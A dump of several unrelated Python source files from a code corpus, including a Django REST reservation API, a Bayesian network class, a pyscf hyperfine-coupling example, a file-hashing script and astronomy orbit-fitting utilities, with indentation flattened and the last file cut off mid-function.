main_image.grid(column=0, row=0, columnspan=2)
main_image.image = m_image
# Create a botton to start the application
btn = Button(root, text="Iniciar", width=25, command=iniciar, bg='white')
btn.grid(column=0,row=1,padx=5,pady=5)
# Create a button to finish the application
btnFinalizar = Button(root, text="Finalizar", width=25, command=finalizar, bg='white')
btnFinalizar.grid(column=1,row=1,padx=5,pady=5)
# Create an event loop
root.mainloop()
# Destroy all
cap.release()
cv2.destroyAllWindows()
if __name__=="__main__":
main()
|
py | 1a37cf1236a7c1839b34ecc48b7610d78bdb728b | import hashlib
from os.path import getsize
myfile = "C:\\temp\\vobs.tar.gz"
#myfile = "/upload/2006_03_07.0203.tar.gz"
# Read in binary mode so the digests reflect the file's actual bytes
myhandle = open(myfile, "rb")
data = myhandle.read()
myhandle.close()
m = hashlib.md5()
s = hashlib.sha1()
m.update(data)
s.update(data)
print("MD5 digest: %s" % m.hexdigest())
print("SHA1 digest: %s" % s.hexdigest())
print("Payload size: %s" % getsize(myfile))
|
py | 1a37cf97aa8210db33a86e00a0246e08dbce3e2b | import numpy as np
from bpn import new, trf
from bpn.utils import get
from numpy.linalg import inv
def demo():
"""camera, object = demo()"""
d = Dancer()
d.translate((2, 1, 0))
d.turn(30)
d.turn_head(45)
return d
class Dancer:
def __init__(self):
# create dancer
body = new.cone(name='body',r1=0.2, r2=0.2, h=1.5)
body.translate(z=0.75)
body.scale((0.5, 1, 1))
body.apply_matrix()
head = new.cone(name='head', r1=0.2, r2=0, h=0.3)
head.rotate((0.,90.,0.))
head.translate(x=0.1)
head.apply_matrix()
head.translate(z=1.6)
self.gp = []
self.gp.append(body.show_frame())
self.gp.append(head.show_frame())
# create markers
m1 = new.sphere(name='m1', r=0.05)
self.m1_pos = trf.PointCloud((-0.1, 0, 1)) # both body frame and world frame
self.body = body
self.head = head
self.m1 = m1
self.screen = new.empty()
self.screen.frame = self.head.frame
self.screen.translate((1, 0, -0.3))
self.m1viz = new.sphere(name='m1viz', r=0.08)
self._update_m1()
def translate(self, delta=(0., 0., 0.)):
self.body.translate(delta)
self.head.translate(delta)
self.screen.translate(delta)
self._update_m1()
self.body.show_frame()
self.head.show_frame()
self.screen.show_frame()
def turn(self, angle_deg):
self.body.rotate((0., 0., angle_deg))
self.screen.frame = self.screen.frame.transform(trf.m4(trf.twisttf(angle_deg*np.pi/180)), tf_frame=self.head.frame)
self.head.rotate((0., 0., angle_deg))
self._update_m1()
self.body.show_frame()
self.head.show_frame()
self.screen.show_frame()
def turn_head(self, angle_deg):
self.head.rotate((0., 0., angle_deg))
self.screen.frame = self.screen.frame.transform(trf.m4(trf.twisttf(angle_deg*np.pi/180)), tf_frame=self.head.frame)
self.head.show_frame()
self.screen.show_frame()
self._update_m1()
def _update_m1(self):
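        # m1 lives at a fixed position in the body frame; m1viz reinterprets
        # those body-frame coordinates in the screen frame for visualization.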
self.m1.loc = self.m1_pos.transform(self.body.frame.m).co[0]
self.m1viz.loc = (self.screen.frame.m@inv(self.body.frame.m)@np.hstack((self.m1.loc, 1)))[:-1]
# self.m1viz.loc = trf.PointCloud(trf.PointCloud(self.m1.loc).in_frame(self.body.frame.m).co[0], self.screen.frame).in_world().co[0]
def __neg__(self):
-self.body
-self.head
-self.m1
for g in self.gp:
-g
|
py | 1a37d078645cde6410aca3b04ecbd8c314f212dd | """
Bayesian Network class
"""
import pandas as pd
from .conditional_probability_table import ConditionalProbabilityTable as CPT
from .directed_acyclic_graph import DirectedAcyclicGraph
from .markov_network import MarkovNetwork
from .factor import Factor
from .null_graphviz_dag import NullGraphvizDag
class BayesianNetwork(DirectedAcyclicGraph):
"""
Bayesian Network that stores ConditionalProbabilityTables.
Parameters:
cpts: list[ConditionalProbabilityTable]. Optional.
Meant for specifying conditional probability tables of variables
            that are endogenous.
priors: list[ConditionalProbabilityTable]. Optional.
Meant for probability tables of Variables that are exogenous.
graphviz_dag: DiGraph
Could be used to display the graph.
"""
def __init__(self, cpts=None, priors=None, graphviz_dag=None):
super().__init__()
if graphviz_dag is None:
self.graphviz_dag = NullGraphvizDag()
else:
self.graphviz_dag = graphviz_dag
if cpts is None:
self.cpts = {}
else:
self.cpts = {}
for cpt in cpts:
self.add_edge(cpt)
if priors:
for prior_cpt in priors:
self.add_node(prior_cpt)
def __repr__(self):
return f"BayesianNetwork(\n\t{self.cpts})"
def add_prior(self, cpt):
"""
Add a conditional probability table. This adds a node.
Parameters
cpt: ConditionalProbabilityTable
"""
self.add_node(cpt)
def set_priors(self, dictionary, data_class, data_storage_folder=None):
"""
Parameters:
dictionary: dict
Ex: {
'prior_var_a': {
'value_it_can_take_1': 0.2,
'value_it_can_take_2': 0.3,
...
}
'prior_var_b': {
'value_it_can_take_1': 0.4,
'value_it_can_take_2': 0.2,
...
}
}
"""
for prior_var, mapping in dictionary.items():
collection = []
for value_prior_var_can_take, proba in mapping.items():
collection.append(
{
prior_var: value_prior_var_can_take,
'value': proba
}
)
df = pd.DataFrame(collection)
givens = list(set(df.columns) - {'value', prior_var})
cpt = CPT(
data_class(
df,
data_storage_folder
),
givens=givens,
outcomes=[prior_var]
)
self.add_prior(cpt)
def add_cpt(self, cpt):
"""
Add a conditional probability table. This in turn adds an edge.
Parameters
cpt: ConditionalProbabilityTable
"""
self.add_edge(cpt)
def add_node(self, cpt):
"""
Add a conditional probability table. This adds a node.
Parameters:
cpt: ConditionalProbabilityTable
"""
outcomes = cpt.get_outcomes()
if cpt.get_givens():
raise ValueError(
"There should not be any givens for the CPT when adding a"
+ " node."
)
if len(outcomes) != 1:
raise ValueError(
"There should only be one outcome for a CPT of a "
+ "Bayesian Network."
)
for outcome in outcomes:
self.cpts[outcome] = cpt
self.graphviz_dag.node(outcome)
super().add_node(outcome)
def add_edge(self, cpt):
"""
Add a conditional probability table. This in turn adds an edge.
Parameters:
cpt: ConditionalProbabilityTable
"""
outcomes = cpt.get_outcomes()
givens = cpt.get_givens()
if len(outcomes) != 1:
raise ValueError(
"There should only be one outcome for a CPT of a "
+ "Bayesian Network."
)
for outcome in outcomes:
self.cpts[outcome] = cpt
for given in givens:
self.graphviz_dag.edge(given, outcome)
super().add_edge(start=given, end=outcome)
def find_cpt_for_node(self, node):
"""
Find conditional probability table for node.
Parameters:
node: str
Returns: ConditionalProbabilityTable
"""
return self.cpts[node]
def to_markov_network(self):
"""
Returns: MarkovNetwork
"""
markov_network = MarkovNetwork()
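        # Each CPT contributes one factor over its outcome variable and givens.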
for _, cpt in self.cpts.items():
factor = Factor(cpt=cpt)
markov_network.add_factor(factor)
return markov_network
|
py | 1a37d1cd4efd531b87c5872fdb0388fe341612a4 | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'open_analyse.settings.develop')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
py | 1a37d3524e32c02fb768d0777ef86fb439cd2b66 | from sirius_sdk.agent.consensus.simple.messages import InitRequestLedgerMessage, InitResponseLedgerMessage, MicroLedgerState, \
ProposeTransactionsMessage, PreCommitTransactionsMessage, CommitTransactionsMessage, PostCommitTransactionsMessage
from sirius_sdk.agent.consensus.simple.state_machines import MicroLedgerSimpleConsensus
__all__ = [
'MicroLedgerSimpleConsensus', 'InitRequestLedgerMessage',
'InitResponseLedgerMessage', 'MicroLedgerState',
'ProposeTransactionsMessage', 'PreCommitTransactionsMessage',
'CommitTransactionsMessage', 'PostCommitTransactionsMessage'
]
|
py | 1a37d40e7c1c94c40e5bb7caf4371a26998c7b06 | import operator
import uuid
from functools import reduce
import arrow
import django_filters
from arrow.parser import ParserError
from django.conf import settings
from guardian.core import ObjectPermissionChecker
from django.contrib.auth import get_user_model
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import (
PermissionDenied, ValidationError as DjangoValidationError
)
from django.db.models import Q
from django.utils import timezone
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import viewsets, serializers, filters, exceptions, permissions
from rest_framework.authentication import TokenAuthentication, SessionAuthentication
from rest_framework.fields import BooleanField, IntegerField
from rest_framework import renderers
from rest_framework.exceptions import NotAcceptable, ValidationError
from rest_framework.settings import api_settings as drf_settings
from munigeo import api as munigeo_api
from resources.models import (
Reservation, Resource, ReservationMetadataSet, ReservationCancelReasonCategory, ReservationCancelReason)
from resources.models.reservation import RESERVATION_EXTRA_FIELDS
from resources.pagination import ReservationPagination
from resources.models.utils import generate_reservation_xlsx, get_object_or_none
from ..auth import is_general_admin
from .base import (
NullableDateTimeField, TranslatedModelSerializer, register_view, DRFFilterBooleanWidget,
ExtraDataMixin
)
from respa.renderers import ResourcesBrowsableAPIRenderer
User = get_user_model()
# FIXME: Make this configurable?
USER_ID_ATTRIBUTE = 'id'
try:
User._meta.get_field('uuid')
USER_ID_ATTRIBUTE = 'uuid'
except Exception:
pass
class UserSerializer(TranslatedModelSerializer):
display_name = serializers.ReadOnlyField(source='get_display_name')
email = serializers.ReadOnlyField()
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
if USER_ID_ATTRIBUTE == 'id':
# id field is read_only by default, that needs to be changed
# so that the field will be validated
self.fields['id'] = IntegerField(label='ID')
else:
# if the user id attribute isn't id, modify the id field to point to the right attribute.
# the field needs to be of the right type so that validation works correctly
model_field_type = type(get_user_model()._meta.get_field(USER_ID_ATTRIBUTE))
serializer_field = self.serializer_field_mapping[model_field_type]
self.fields['id'] = serializer_field(source=USER_ID_ATTRIBUTE, label='ID')
class Meta:
model = get_user_model()
fields = ('id', 'display_name', 'email')
class ReservationCancelReasonCategorySerializer(TranslatedModelSerializer):
class Meta:
model = ReservationCancelReasonCategory
fields = [
'id', 'reservation_type', 'name', 'description'
]
class ReservationCancelReasonSerializer(serializers.ModelSerializer):
category = ReservationCancelReasonCategorySerializer(read_only=True)
category_id = serializers.PrimaryKeyRelatedField(write_only=True,
source='category',
queryset=ReservationCancelReasonCategory.objects.all())
class Meta:
model = ReservationCancelReason
fields = [
'category', 'description', 'reservation', 'category_id'
]
class ReservationSerializer(ExtraDataMixin, TranslatedModelSerializer, munigeo_api.GeoModelSerializer):
begin = NullableDateTimeField()
end = NullableDateTimeField()
user = UserSerializer(required=False)
is_own = serializers.SerializerMethodField()
state = serializers.ChoiceField(choices=Reservation.STATE_CHOICES, required=False)
need_manual_confirmation = serializers.ReadOnlyField()
user_permissions = serializers.SerializerMethodField()
cancel_reason = ReservationCancelReasonSerializer(required=False)
patchable_fields = ['state', 'cancel_reason']
class Meta:
model = Reservation
fields = [
'url', 'id', 'resource', 'user', 'begin', 'end', 'comments', 'is_own', 'state', 'need_manual_confirmation',
'staff_event', 'access_code', 'user_permissions', 'type', 'cancel_reason'
] + list(RESERVATION_EXTRA_FIELDS)
read_only_fields = list(RESERVATION_EXTRA_FIELDS)
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
data = self.get_initial()
resource = None
# try to find out the related resource using initial data if that is given
resource_id = data.get('resource') if data else None
if resource_id:
resource = get_object_or_none(Resource, id=resource_id)
# if that didn't work out use the reservation's old resource if such exists
if not resource:
if isinstance(self.instance, Reservation) and isinstance(self.instance.resource, Resource):
resource = self.instance.resource
# set supported and required extra fields
if resource:
cache = self.context.get('reservation_metadata_set_cache')
supported = resource.get_supported_reservation_extra_field_names(cache=cache)
required = resource.get_required_reservation_extra_field_names(cache=cache)
# staff events have less requirements
request_user = self.context['request'].user
is_staff_event = data.get('staff_event', False)
if is_staff_event and resource.can_create_staff_event(request_user):
required = {'reserver_name', 'event_description'}
# we don't need to remove a field here if it isn't supported, as it will be read-only and will be more
# easily removed in to_representation()
for field_name in supported:
self.fields[field_name].read_only = False
for field_name in required:
self.fields[field_name].required = True
self.context.update({'resource': resource})
    def get_extra_fields(self, includes, context):
        """ Define extra fields that can be included via query parameters. Method from ExtraDataMixin."""
        from .resource import ResourceInlineSerializer
        extra_fields = {}
if 'resource_detail' in includes:
extra_fields['resource'] = ResourceInlineSerializer(read_only=True, context=context)
return extra_fields
def validate_state(self, value):
instance = self.instance
request_user = self.context['request'].user
# new reservations will get their value regardless of this value
if not instance:
return value
# state not changed
if instance.state == value:
return value
if instance.resource.can_approve_reservations(request_user):
allowed_states = (Reservation.REQUESTED, Reservation.CONFIRMED, Reservation.DENIED)
if instance.state in allowed_states and value in allowed_states:
return value
if instance.can_modify(request_user) and value == Reservation.CANCELLED:
return value
raise ValidationError(_('Illegal state change'))
def validate(self, data):
reservation = self.instance
request_user = self.context['request'].user
# this check is probably only needed for PATCH
try:
resource = data['resource']
except KeyError:
resource = reservation.resource
if not resource.can_make_reservations(request_user):
raise PermissionDenied(_('You are not allowed to make reservations in this resource.'))
if 'end' in data and data['end'] < timezone.now():
raise ValidationError(_('You cannot make a reservation in the past'))
if not resource.can_ignore_opening_hours(request_user):
reservable_before = resource.get_reservable_before()
if reservable_before and data['begin'] >= reservable_before:
raise ValidationError(_('The resource is reservable only before %(datetime)s' %
{'datetime': reservable_before}))
reservable_after = resource.get_reservable_after()
if reservable_after and data['begin'] < reservable_after:
raise ValidationError(_('The resource is reservable only after %(datetime)s' %
{'datetime': reservable_after}))
# normal users cannot make reservations for other people
if not resource.can_create_reservations_for_other_users(request_user):
data.pop('user', None)
# Check user specific reservation restrictions relating to given period.
resource.validate_reservation_period(reservation, request_user, data=data)
if data.get('staff_event', False):
if not resource.can_create_staff_event(request_user):
raise ValidationError(dict(staff_event=_('Only allowed to be set by resource managers')))
if 'type' in data:
if (data['type'] != Reservation.TYPE_NORMAL and
not resource.can_create_special_type_reservation(request_user)):
raise ValidationError({'type': _('You are not allowed to make a reservation of this type')})
if 'comments' in data:
if not resource.can_comment_reservations(request_user):
raise ValidationError(dict(comments=_('Only allowed to be set by staff members')))
if 'access_code' in data:
if data['access_code'] is None:
data['access_code'] = ''
access_code_enabled = resource.is_access_code_enabled()
if not access_code_enabled and data['access_code']:
raise ValidationError(dict(access_code=_('This field cannot have a value with this resource')))
if access_code_enabled and reservation and data['access_code'] != reservation.access_code:
raise ValidationError(dict(access_code=_('This field cannot be changed')))
# Mark begin of a critical section. Subsequent calls with this same resource will block here until the first
# request is finished. This is needed so that the validations and possible reservation saving are
# executed in one block and concurrent requests cannot be validated incorrectly.
Resource.objects.select_for_update().get(pk=resource.pk)
# Check maximum number of active reservations per user per resource.
# Only new reservations are taken into account ie. a normal user can modify an existing reservation
# even if it exceeds the limit. (one that was created via admin ui for example).
if reservation is None:
resource.validate_max_reservations_per_user(request_user)
if self.context['request'] and self.context['request'].method == 'PATCH':
for key, val in data.items():
if key not in self.patchable_fields:
raise ValidationError(_('Patching of field %(field)s is not allowed' % {'field': key}))
else:
# Run model clean
instance = Reservation(**data)
try:
instance.clean(original_reservation=reservation, user=request_user)
except DjangoValidationError as exc:
# Convert Django ValidationError to DRF ValidationError so that in the response
# field specific error messages are added in the field instead of in non_field_messages.
if not hasattr(exc, 'error_dict'):
raise ValidationError(exc)
error_dict = {}
for key, value in exc.error_dict.items():
error_dict[key] = [error.message for error in value]
raise ValidationError(error_dict)
return data
def to_internal_value(self, data):
user_data = data.copy().pop('user', None) # handle user manually
deserialized_data = super().to_internal_value(data)
# validate user and convert it to User object
if user_data:
UserSerializer(data=user_data).is_valid(raise_exception=True)
try:
deserialized_data['user'] = User.objects.get(**{USER_ID_ATTRIBUTE: user_data['id']})
except User.DoesNotExist:
raise ValidationError({
'user': {
'id': [_('Invalid pk "{pk_value}" - object does not exist.').format(pk_value=user_data['id'])]
}
})
return deserialized_data
def to_representation(self, instance):
data = super(ReservationSerializer, self).to_representation(instance)
resource = instance.resource
prefetched_user = self.context.get('prefetched_user', None)
user = prefetched_user or self.context['request'].user
if self.context['request'].accepted_renderer.format == 'xlsx':
# Return somewhat different data in case we are dealing with xlsx.
# The excel renderer needs datetime objects, so begin and end are passed as objects
# to avoid needing to convert them back and forth.
data.update(**{
'unit': resource.unit.name, # additional
'resource': resource.name, # resource name instead of id
'begin': instance.begin, # datetime object
'end': instance.end, # datetime object
'user': instance.user.email if instance.user else '', # just email
'created_at': instance.created_at
})
if not resource.can_access_reservation_comments(user):
del data['comments']
if not resource.can_view_reservation_user(user):
del data['user']
if instance.are_extra_fields_visible(user):
cache = self.context.get('reservation_metadata_set_cache')
supported_fields = set(resource.get_supported_reservation_extra_field_names(cache=cache))
else:
del data['cancel_reason']
supported_fields = set()
for field_name in RESERVATION_EXTRA_FIELDS:
if field_name not in supported_fields:
data.pop(field_name, None)
if not (resource.is_access_code_enabled() and instance.can_view_access_code(user)):
data.pop('access_code')
if 'access_code' in data and data['access_code'] == '':
data['access_code'] = None
if instance.can_view_catering_orders(user):
data['has_catering_order'] = instance.catering_orders.exists()
return data
def update(self, instance, validated_data):
request = self.context['request']
cancel_reason = validated_data.pop('cancel_reason', None)
new_state = validated_data.pop('state', instance.state)
validated_data['modified_by'] = request.user
reservation = super().update(instance, validated_data)
if new_state in [Reservation.DENIED, Reservation.CANCELLED] and cancel_reason:
if hasattr(instance, 'cancel_reason'):
instance.cancel_reason.delete()
cancel_reason['reservation'] = reservation
reservation.cancel_reason = ReservationCancelReason(**cancel_reason)
reservation.cancel_reason.save()
reservation.set_state(new_state, request.user)
return reservation
def get_is_own(self, obj):
return obj.user == self.context['request'].user
def get_user_permissions(self, obj):
request = self.context.get('request')
prefetched_user = self.context.get('prefetched_user', None)
user = prefetched_user or request.user
can_modify_and_delete = obj.can_modify(user) if request else False
return {
'can_modify': can_modify_and_delete,
'can_delete': can_modify_and_delete,
}
class UserFilterBackend(filters.BaseFilterBackend):
"""
Filter by user uuid and by is_own.
"""
def filter_queryset(self, request, queryset, view):
user = request.query_params.get('user', None)
if user:
try:
user_uuid = uuid.UUID(user)
except ValueError:
raise exceptions.ParseError(_('Invalid value in filter %(filter)s') % {'filter': 'user'})
queryset = queryset.filter(user__uuid=user_uuid)
if not request.user.is_authenticated:
return queryset
is_own = request.query_params.get('is_own', None)
if is_own is not None:
is_own = is_own.lower()
if is_own in ('true', 't', 'yes', 'y', '1'):
queryset = queryset.filter(user=request.user)
elif is_own in ('false', 'f', 'no', 'n', '0'):
queryset = queryset.exclude(user=request.user)
else:
raise exceptions.ParseError(_('Invalid value in filter %(filter)s') % {'filter': 'is_own'})
return queryset
class ExcludePastFilterBackend(filters.BaseFilterBackend):
"""
Exclude reservations in the past.
"""
def filter_queryset(self, request, queryset, view):
past = request.query_params.get('all', 'false')
past = BooleanField().to_internal_value(past)
if not past:
now = timezone.now()
return queryset.filter(end__gte=now)
return queryset
class ReservationFilterBackend(filters.BaseFilterBackend):
"""
Filter reservations by time.
"""
def filter_queryset(self, request, queryset, view):
params = request.query_params
times = {}
past = False
for name in ('start', 'end'):
if name not in params:
continue
# whenever date filtering is in use, include past reservations
past = True
try:
times[name] = arrow.get(params[name]).to('utc').datetime
except ParserError:
raise exceptions.ParseError("'%s' must be a timestamp in ISO 8601 format" % name)
is_detail_request = 'pk' in request.parser_context['kwargs']
if not past and not is_detail_request:
past = params.get('all', 'false')
past = BooleanField().to_internal_value(past)
if not past:
now = timezone.now()
queryset = queryset.filter(end__gte=now)
if times.get('start', None):
queryset = queryset.filter(end__gte=times['start'])
if times.get('end', None):
queryset = queryset.filter(begin__lte=times['end'])
return queryset
class NeedManualConfirmationFilterBackend(filters.BaseFilterBackend):
def filter_queryset(self, request, queryset, view):
filter_value = request.query_params.get('need_manual_confirmation', None)
if filter_value is not None:
need_manual_confirmation = BooleanField().to_internal_value(filter_value)
return queryset.filter(resource__need_manual_confirmation=need_manual_confirmation)
return queryset
class StateFilterBackend(filters.BaseFilterBackend):
def filter_queryset(self, request, queryset, view):
state = request.query_params.get('state', None)
if state:
queryset = queryset.filter(state__in=state.replace(' ', '').split(','))
return queryset
class CanApproveFilterBackend(filters.BaseFilterBackend):
def filter_queryset(self, request, queryset, view):
filter_value = request.query_params.get('can_approve', None)
if filter_value:
queryset = queryset.filter(resource__need_manual_confirmation=True)
allowed_resources = Resource.objects.with_perm('can_approve_reservation', request.user)
can_approve = BooleanField().to_internal_value(filter_value)
if can_approve:
queryset = queryset.filter(resource__in=allowed_resources)
else:
queryset = queryset.exclude(resource__in=allowed_resources)
return queryset
class ReservationFilterSet(django_filters.rest_framework.FilterSet):
class Meta:
model = Reservation
fields = ('event_subject', 'host_name', 'reserver_name', 'resource_name', 'is_favorite_resource', 'unit')
@property
def qs(self):
qs = super().qs
user = self.request.user
query_params = set(self.request.query_params)
# if any of the extra field related filters are used, restrict results to reservations
# the user has right to see
if bool(query_params & set(RESERVATION_EXTRA_FIELDS)):
qs = qs.extra_fields_visible(user)
if 'has_catering_order' in query_params:
qs = qs.catering_orders_visible(user)
return qs
event_subject = django_filters.CharFilter(lookup_expr='icontains')
host_name = django_filters.CharFilter(lookup_expr='icontains')
reserver_name = django_filters.CharFilter(lookup_expr='icontains')
resource_name = django_filters.CharFilter(field_name='resource', lookup_expr='name__icontains')
is_favorite_resource = django_filters.BooleanFilter(method='filter_is_favorite_resource',
widget=DRFFilterBooleanWidget)
resource_group = django_filters.Filter(field_name='resource__groups__identifier', lookup_expr='in',
widget=django_filters.widgets.CSVWidget, distinct=True)
unit = django_filters.CharFilter(field_name='resource__unit_id')
has_catering_order = django_filters.BooleanFilter(method='filter_has_catering_order', widget=DRFFilterBooleanWidget)
resource = django_filters.Filter(lookup_expr='in', widget=django_filters.widgets.CSVWidget)
reserver_info_search = django_filters.CharFilter(method="filter_reserver_info_search")
def filter_is_favorite_resource(self, queryset, name, value):
user = self.request.user
if not user.is_authenticated:
return queryset.none() if value else queryset
filtering = {'resource__favorited_by': user}
return queryset.filter(**filtering) if value else queryset.exclude(**filtering)
def filter_has_catering_order(self, queryset, name, value):
return queryset.exclude(catering_orders__isnull=value)
def filter_reserver_info_search(self, queryset, name, value):
"""
A partial copy of rest_framework.filters.SearchFilter.filter_queryset.
Needed due to custom filters applied to queryset within this ReservationFilterSet.
Does not support comma separation of values, i.e. '?reserver_info_search=foo,bar' will
be considered as one string - 'foo,bar'.
"""
if not value:
return queryset
fields = ('user__first_name', 'user__last_name', 'user__email')
conditions = []
for field in fields:
conditions.append(Q(**{field + '__icontains': value}))
        # assume that first_name and last_name were provided if a space was found
if ' ' in value and value.count(' ') == 1:
name1, name2 = value.split()
filters = Q(
user__first_name__icontains=name1,
user__last_name__icontains=name2,
) | Q(
user__first_name__icontains=name2,
user__last_name__icontains=name1,
)
conditions.append(filters)
return queryset.filter(reduce(operator.or_, conditions))
class ReservationPermission(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj.can_modify(request.user)
class ReservationExcelRenderer(renderers.BaseRenderer):
media_type = 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
format = 'xlsx'
charset = None
render_style = 'binary'
def render(self, data, media_type=None, renderer_context=None):
if not renderer_context or renderer_context['response'].status_code == 404:
return bytes()
if renderer_context['view'].action == 'retrieve':
return generate_reservation_xlsx([data])
elif renderer_context['view'].action == 'list':
return generate_reservation_xlsx(data['results'])
else:
            raise NotAcceptable()
class ReservationCacheMixin:
def _preload_permissions(self):
units = set()
resource_groups = set()
resources = set()
checker = ObjectPermissionChecker(self.request.user)
for rv in self._page:
resources.add(rv.resource)
rv.resource._permission_checker = checker
for res in resources:
units.add(res.unit)
for g in res.groups.all():
resource_groups.add(g)
if units:
checker.prefetch_perms(units)
if resource_groups:
checker.prefetch_perms(resource_groups)
def _get_cache_context(self):
context = {}
set_list = ReservationMetadataSet.objects.all().prefetch_related('supported_fields', 'required_fields')
context['reservation_metadata_set_cache'] = {x.id: x for x in set_list}
self._preload_permissions()
return context
class ReservationViewSet(munigeo_api.GeoModelAPIView, viewsets.ModelViewSet, ReservationCacheMixin):
queryset = Reservation.objects.select_related('user', 'resource', 'resource__unit')\
.prefetch_related('catering_orders').prefetch_related('resource__groups').order_by('begin', 'resource__unit__name', 'resource__name')
if settings.RESPA_PAYMENTS_ENABLED:
queryset = queryset.prefetch_related('order', 'order__order_lines', 'order__order_lines__product')
filter_backends = (DjangoFilterBackend, filters.OrderingFilter, UserFilterBackend, ReservationFilterBackend,
NeedManualConfirmationFilterBackend, StateFilterBackend, CanApproveFilterBackend)
filterset_class = ReservationFilterSet
permission_classes = (permissions.IsAuthenticatedOrReadOnly, ReservationPermission)
renderer_classes = (renderers.JSONRenderer, ResourcesBrowsableAPIRenderer, ReservationExcelRenderer)
pagination_class = ReservationPagination
authentication_classes = (
list(drf_settings.DEFAULT_AUTHENTICATION_CLASSES) +
[TokenAuthentication, SessionAuthentication])
ordering_fields = ('begin',)
def get_serializer_class(self):
if settings.RESPA_PAYMENTS_ENABLED:
from payments.api.reservation import PaymentsReservationSerializer # noqa
return PaymentsReservationSerializer
else:
return ReservationSerializer
def get_serializer(self, *args, **kwargs):
if 'data' not in kwargs and len(args) == 1:
# It's a read operation
instance_or_page = args[0]
if isinstance(instance_or_page, Reservation):
self._page = [instance_or_page]
else:
self._page = instance_or_page
return super().get_serializer(*args, **kwargs)
def get_serializer_context(self, *args, **kwargs):
context = super().get_serializer_context(*args, **kwargs)
if hasattr(self, '_page'):
context.update(self._get_cache_context())
request_user = self.request.user
if request_user.is_authenticated:
prefetched_user = get_user_model().objects.prefetch_related('unit_authorizations', 'unit_group_authorizations__subject__members').\
get(pk=request_user.pk)
context['prefetched_user'] = prefetched_user
return context
def get_queryset(self):
queryset = super().get_queryset()
user = self.request.user
# General Administrators can see all reservations
if is_general_admin(user):
return queryset
# normal users can see only their own reservations and reservations that are confirmed, requested or
# waiting for payment
filters = Q(state__in=(Reservation.CONFIRMED, Reservation.REQUESTED, Reservation.WAITING_FOR_PAYMENT))
if user.is_authenticated:
filters |= Q(user=user)
queryset = queryset.filter(filters)
queryset = queryset.filter(resource__in=Resource.objects.visible_for(user))
return queryset
def perform_create(self, serializer):
override_data = {'created_by': self.request.user, 'modified_by': self.request.user}
if 'user' not in serializer.validated_data:
override_data['user'] = self.request.user
override_data['state'] = Reservation.CREATED
instance = serializer.save(**override_data)
resource = serializer.validated_data['resource']
if resource.need_manual_confirmation and not resource.can_bypass_manual_confirmation(self.request.user):
new_state = Reservation.REQUESTED
else:
if instance.get_order():
new_state = Reservation.WAITING_FOR_PAYMENT
else:
new_state = Reservation.CONFIRMED
instance.set_state(new_state, self.request.user)
def perform_destroy(self, instance):
instance.set_state(Reservation.CANCELLED, self.request.user)
def list(self, request, *args, **kwargs):
response = super().list(request, *args, **kwargs)
if request.accepted_renderer.format == 'xlsx':
response['Content-Disposition'] = 'attachment; filename={}.xlsx'.format(_('reservations'))
return response
def retrieve(self, request, *args, **kwargs):
response = super().retrieve(request, *args, **kwargs)
if request.accepted_renderer.format == 'xlsx':
response['Content-Disposition'] = 'attachment; filename={}-{}.xlsx'.format(_('reservation'), kwargs['pk'])
return response
class ReservationCancelReasonCategoryViewSet(viewsets.ReadOnlyModelViewSet):
queryset = ReservationCancelReasonCategory.objects.all()
filter_backends = (DjangoFilterBackend,)
serializer_class = ReservationCancelReasonCategorySerializer
filterset_fields = ['reservation_type']
pagination_class = None
register_view(ReservationViewSet, 'reservation')
register_view(ReservationCancelReasonCategoryViewSet, 'cancel_reason_category')
|
py | 1a37d46c672aa4ed432dc56559729a79d5ceddce | #!/usr/bin/env python
from pyscf import gto, scf, dft
from pyscf.prop import hfc
mol = gto.M(atom='''
C 0 0 0
N 0 0 1.1747
''',
basis='ccpvdz', spin=1, charge=0, verbose=3)
mf = scf.UHF(mol).run()
gobj = hfc.uhf.HFC(mf).set(verbose=4)
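# sso / soo toggle the two-electron spin-same-orbit and spin-other-orbit
# contributions; so_eff_charge=False disables the effective-charge (Koseki)
# approximation for the spin-orbit integrals in favor of the explicit terms.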
gobj.sso = True
gobj.soo = True
gobj.so_eff_charge = False
gobj.kernel()
|
py | 1a37d4c1bc00f0acecf7e955c7319b3582584f75 | # Generated by Django 2.0.2 on 2018-04-17 16:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0004_auto_20180417_1911'),
]
operations = [
migrations.RenameModel(
old_name='CategoryModel',
new_name='TagModel',
),
migrations.RenameField(
model_name='postmodel',
old_name='category',
new_name='tags',
),
]
|
py | 1a37d53201068d45434ab0dd0c569955582e515c | from orbit_fits import *
def ref_frame():
"""Print properties of the reference frame"""
print(gc_frame)
def potentials():
"""Print properties of the gravitational potentials used"""
pot = [ham, ham_bovy, ham_heavy]
name = ['fiducial', 'bovy', 'heavy']
#pos = np.array([[0, 0, 25], [0,0,200]]).T * u.kpc
pos = np.array([[25, 0, 0], [200,0,0]]).T * u.kpc
mass = np.zeros((3,2)) * u.Msun
for e, p in enumerate(pot):
print(name[e])
# potential parameters
keys = p.potential.parameters.keys()
for k in keys:
print(k, p.potential.parameters[k])
# enclosed mass
mass[e] = p.potential.mass_enclosed(pos)
print(mass[e])
print(mass[0])
print(mass[1]/mass[0])
print(mass[2]/mass[0])
def plot_enclosed_mass():
"""Plot the ratio of enclosed mass for the adopted potentials"""
pot = [ham, ham_bovy, ham_heavy]
name = ['Fiducial', 'MWPotential2014', 'Price-Whelan & Bonaca (2018)']
colors = ['k', 'tab:blue', 'tab:red']
pos = np.zeros((3,100)) * u.kpc
pos[0] = np.logspace(np.log10(20./100.), np.log10(20*10.), pos.shape[1]) * u.kpc
mass = np.zeros((3,100))
for e, p in enumerate(pot):
mass[e] = p.potential.mass_enclosed(pos)
plt.close()
plt.figure(figsize=(8,6))
for i in range(3):
